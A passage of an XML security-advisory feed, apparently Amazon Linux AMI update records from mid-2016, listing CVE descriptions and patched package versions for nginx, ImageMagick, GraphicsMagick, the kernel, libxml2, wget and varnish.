</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3099" title="" id="CVE-2016-3099" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_nss-debuginfo" version="1.0.12" release="4.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_nss-debuginfo-1.0.12-4.22.amzn1.x86_64.rpm</filename></package><package name="mod24_nss" version="1.0.12" release="4.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_nss-1.0.12-4.22.amzn1.x86_64.rpm</filename></package><package name="mod24_nss" version="1.0.12" release="4.22.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_nss-1.0.12-4.22.amzn1.i686.rpm</filename></package><package name="mod24_nss-debuginfo" version="1.0.12" release="4.22.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_nss-debuginfo-1.0.12-4.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-715</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-715: medium priority package update for nginx</title><issued date="2016-06-15 13:30:00" /><updated date="2016-06-15 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4450:
A problem was identified in the nginx code responsible for saving a client request body to a temporary file. A specially crafted request might result in a worker process crash due to a NULL pointer dereference while writing the client request body to a temporary file.
1341462:
CVE-2016-4450 nginx: NULL pointer dereference while writing client request body
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4450" title="" id="CVE-2016-4450" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx" version="1.8.1" release="3.27.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.8.1-3.27.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.8.1" release="3.27.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.8.1-3.27.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.8.1" release="3.27.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.8.1-3.27.amzn1.i686.rpm</filename></package><package name="nginx" version="1.8.1" release="3.27.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.8.1-3.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-716</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-716: important priority package update for ImageMagick</title><issued date="2016-06-22 15:00:00" /><updated date="2016-06-22 15:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5240:
1333417:
CVE-2016-5240 ImageMagick: SVG converting issue resulting in DoS
CVE-2016-5239:
It was discovered that ImageMagick did not properly sanitize certain input before passing it to the gnuplot delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.
1334188:
CVE-2016-5239 ImageMagick,GraphicsMagick: Gnuplot delegate vulnerability allowing command injection
CVE-2016-5118:
It was discovered that ImageMagick did not properly sanitize certain input before using it to invoke processes. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.
1340814:
CVE-2016-5118 ImageMagick: Remote code execution via filename
CVE-2015-8898:
1344264:
CVE-2015-8898 ImageMagick: Prevent NULL pointer access in magick/constitute.c
CVE-2015-8897:
1344271:
CVE-2015-8897 ImageMagick: Crash due to out of bounds error in SpliceImage
CVE-2015-8896:
1269562:
CVE-2015-8896 ImageMagick: Integer truncation vulnerability in coders/pict.c
CVE-2015-8895:
1269553:
CVE-2015-8895 ImageMagick: Integer and buffer overflow in coders/icon.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8895" title="" id="CVE-2015-8895" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8896" title="" id="CVE-2015-8896" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8897" title="" id="CVE-2015-8897" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8898" title="" id="CVE-2015-8898" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5118" title="" id="CVE-2016-5118" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5239" title="" id="CVE-2016-5239" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5240" title="" id="CVE-2016-5240" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-perl" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.7.8.9" release="15.21.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ImageMagick-c++-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.7.8.9-15.21.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.7.8.9-15.21.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.7.8.9-15.21.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.7.8.9-15.21.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.7.8.9-15.21.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.7.8.9-15.21.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.7.8.9-15.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-717</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-717: important priority package update for GraphicsMagick</title><issued date="2016-06-22 15:00:00" /><updated date="2016-06-22 15:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that 
fix the following vulnerabilities:
CVE-2016-5241:
CVE-2016-5118:
It was discovered that ImageMagick did not properly sanitize certain input before using it to invoke processes. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.
1340814:
CVE-2016-5118 ImageMagick: Remote code execution via filename
CVE-2016-2318:
CVE-2016-2317:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2317" title="" id="CVE-2016-2317" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2318" title="" id="CVE-2016-2318" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5118" title="" id="CVE-2016-5118" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5241" title="" id="CVE-2016-5241" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-debuginfo" version="1.3.24" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.24-1.8.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.24" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.24-1.8.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-doc" version="1.3.24" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.24-1.8.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.24" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.24-1.8.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.24" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.24-1.8.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.24" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.24-1.8.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.24" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.24-1.8.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.24" release="1.8.amzn1" epoch="0" 
arch="i686"><filename>Packages/GraphicsMagick-1.3.24-1.8.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.24" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.24-1.8.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.24" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.24-1.8.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.24" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.24-1.8.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.24" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.24-1.8.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.24" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.24-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-718</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-718: medium priority package update for kernel</title><issued date="2016-06-24 22:21:00" /><updated date="2017-01-19 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9806:
A double free vulnerability was found in netlink_dump, which could cause a denial of service or possibly other unspecified impact.
1401502:
CVE-2016-9806 kernel: netlink: double-free in netlink_dump
CVE-2016-4998:
An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root; however, some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments.
1349886:
CVE-2016-4998 kernel: out of bounds reads when processing IPT_SO_SET_REPLACE setsockopt
CVE-2016-4997:
A flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitrary kernel memory when unloading a kernel module. This action is usually restricted to root-privileged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated privileges.
1349722:
CVE-2016-4997 kernel: compat IPT_SO_SET_REPLACE setsockopt
CVE-2016-4951:
A vulnerability was found in the Linux kernel. The pointer to the netlink socket attribute is not checked, which could cause a null pointer dereference when parsing the nested attributes in function tipc_nl_publ_dump(). This allows local users to cause a DoS.
1338625:
CVE-2016-4951 kernel: Null pointer dereference in tipc_nl_publ_dump
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4951" title="" id="CVE-2016-4951" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4997" title="" id="CVE-2016-4997" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4998" title="" id="CVE-2016-4998" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9806" title="" id="CVE-2016-9806" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.14" release="24.50.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.14" release="24.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.14-24.50.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.14" release="24.50.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.14" release="24.50.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.14-24.50.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.14" release="24.50.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.14-24.50.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-719</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-719: important priority package update for libxml2</title><issued date="2016-07-14 16:30:00" /><updated date="2016-07-14 16:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4449:
XML external entity (XXE) vulnerability in the xmlStringLenDecodeEntities function in parser.c in libxml2 before 2.9.4, when not in validating mode, allows context-dependent attackers to read arbitrary files or cause a denial of service (resource consumption) via unspecified vectors.
1338701:
CVE-2016-4449 libxml2: Inappropriate fetch of entities content
CVE-2016-4448:
Format string vulnerability in libxml2 before 2.9.4 allows attackers to have unspecified impact via format string specifiers in unknown vectors.
1338700:
CVE-2016-4448 libxml2: Format string vulnerability
CVE-2016-4447:
The xmlParseElementDecl function in parser.c in libxml2 before 2.9.4 allows context-dependent attackers to cause a denial of service (heap-based buffer underread and application crash) via a crafted file, involving xmlParseName.
1338686:
CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName
CVE-2016-3705:
A missing increment of the recursion depth counter was found in the xmlParserEntityCheck() and xmlParseAttValueComplex() functions used for parsing XML data. An attacker could launch a Denial of Service attack by passing specially crafted XML data to an application, forcing it to crash due to stack exhaustion.
1332443:
CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file
CVE-2016-3627:
Missing recursive loop detection checks were found in the xmlParserEntityCheck() and xmlStringGetNodeList() functions of libxml2, causing applications using the library to crash through stack exhaustion while building the associated data. An attacker able to send XML data to be parsed in recovery mode could launch a Denial of Service attack on the application.
1319829:
CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode
CVE-2016-1840:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1833, CVE-2016-1834, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, and CVE-2016-1839.
1338706:
CVE-2016-1840 libxml2: Heap-buffer-overflow in xmlFAParserPosCharGroup
CVE-2016-1839:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1833, CVE-2016-1834, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, and CVE-2016-1840.
1338703:
CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString
CVE-2016-1838:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1833, CVE-2016-1834, CVE-2016-1836, CVE-2016-1837, CVE-2016-1839, and CVE-2016-1840.
1338705:
CVE-2016-1838 libxml2: Heap-based buffer overread in xmlParserPrintFileContextInternal
CVE-2016-1837:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1833, CVE-2016-1834, CVE-2016-1836, CVE-2016-1838, CVE-2016-1839, and CVE-2016-1840.
1338696:
CVE-2016-1837 libxml2: Heap use-after-free in htmlParsePubidLiteral and htmlParseSystemLiteral
CVE-2016-1836:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1833, CVE-2016-1834, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, and CVE-2016-1840.
1338702:
CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey
CVE-2016-1835:
libxml2, as used in Apple iOS before 9.3.2 and OS X before 10.11.5, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document.
1338691:
CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs
CVE-2016-1834:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1833, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, and CVE-2016-1840.
1338708:
CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat
CVE-2016-1833:
libxml2, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document, a different vulnerability than CVE-2016-1834, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, and CVE-2016-1840.
1338682:
CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar
CVE-2016-1762:
libxml2 in Apple iOS before 9.3, OS X before 10.11.4, Safari before 9.1, tvOS before 9.2, and watchOS before 2.2 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted XML document.
1338711:
CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1762" title="" id="CVE-2016-1762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1833" title="" id="CVE-2016-1833" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1834" title="" id="CVE-2016-1834" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1835" title="" id="CVE-2016-1835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1836" title="" id="CVE-2016-1836" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1837" title="" id="CVE-2016-1837" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1838" title="" id="CVE-2016-1838" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1839" title="" id="CVE-2016-1839" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1840" title="" id="CVE-2016-1840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3627" title="" id="CVE-2016-3627" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3705" title="" id="CVE-2016-3705" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4447" title="" id="CVE-2016-4447" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4448" title="" id="CVE-2016-4448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4449" title="" id="CVE-2016-4449" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-static" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.3.49.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" 
release="6.3.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.3.49.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.3.49.amzn1.x86_64.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.3.49.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.3.49.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.3.49.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.3.49.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.3.49.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.3.49.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.3.49.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.3.49.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.3.49.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.3.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" 
type="security" from="linux-security@amazon.com"><id>ALAS-2016-720</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-720: medium priority package update for wget</title><issued date="2016-07-14 16:30:00" /><updated date="2016-07-14 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4971:
GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource.
1343666:
CVE-2016-4971 wget: Lack of filename checking allows arbitrary file upload via FTP redirect
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971" title="" id="CVE-2016-4971" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wget" version="1.18" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-1.18-1.18.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-debuginfo-1.18-1.18.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/wget-debuginfo-1.18-1.18.amzn1.i686.rpm</filename></package><package name="wget" version="1.18" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/wget-1.18-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-721</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-721: important priority package update for varnish</title><issued date="2016-07-14 16:30:00" /><updated date="2016-07-14 16:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8852:
Varnish 3.x before 3.0.7, when used in certain stacked installations, allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via a header line terminated by a \r (carriage return) character in conjunction with multiple Content-Length headers in an HTTP request.
1328361:
CVE-2015-8852 varnish: http smuggling issues
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8852" title="" id="CVE-2015-8852" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="varnish-libs-devel" version="3.0.7" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-libs-devel-3.0.7-1.20.amzn1.x86_64.rpm</filename></package><package name="varnish-libs" version="3.0.7" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-libs-3.0.7-1.20.amzn1.x86_64.rpm</filename></package><package name="varnish" version="3.0.7" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-3.0.7-1.20.amzn1.x86_64.rpm</filename></package><package name="varnish-docs" version="3.0.7" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-docs-3.0.7-1.20.amzn1.x86_64.rpm</filename></package><package name="varnish-debuginfo" version="3.0.7" release="1.20.amzn1" epoch="0" 